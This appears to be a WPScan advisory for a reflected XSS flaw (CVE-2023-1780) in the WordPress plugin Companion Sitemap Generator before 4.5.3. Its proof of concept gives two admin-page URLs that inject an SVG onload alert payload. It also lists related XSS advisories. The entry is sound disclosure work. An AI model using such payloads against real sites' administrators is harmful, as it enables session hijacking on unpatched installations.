Companion Sitemap Generator < 4.5.3 – Reflected XSS | CVE 2023-1780 | Plugin Vulnerabilities

Description

The plugin does not sanitise and escape some parameters before outputting them back in pages, leading to Reflected Cross-Site Scripting which could be used against high privilege users such as admin.

Proof of Concept

Make a logged-in admin open:

https://example.com/wp-admin/tools.php?page=csg-sitemap&tabbed=<svg/onload=alert(/XSS/)>

https://example.com/wp-admin/tools.php?page=csg-sitemap&tabbed=exclusion&subtabt=<svg/onload=alert(/XSS/)>

Affects Plugins

companion-sitemap-generator

Fixed in 4.5.3

References

CVE

Classification

Type

XSS

OWASP top 10

A7: Cross-Site Scripting (XSS)

CWE

CVSS

Miscellaneous

Original Researcher

Erwan LR (WPScan)

Verified

Yes

WPVDB ID

8176308f-f210-4109-9c88-9372415dbed3

Timeline

Publicly Published

2023-06-19 (about 10 months ago)

Added

2023-06-19 (about 10 months ago)

Last Updated

2023-06-19 (about 10 months ago)

Other

Published

Title

Published

2022-06-14

Title

404 to 301 < 3.1.2 - Reflected Cross-Site Scripting

Published

2021-12-24

Title

Affiliates Manager < 2.9.0 - Unauthenticated Stored Cross-Site Scripting

Published

2020-06-23

Title

WooCommerce < 4.2.1 - Potential Cross-Site Scripting (XSS) via SelectWoo

Published

2023-05-22

Title

Leyka < 3.30.2 - Reflected XSS

Published

2014-08-01

Title

ReFlex Gallery 1.4.2 - Unspecified XSS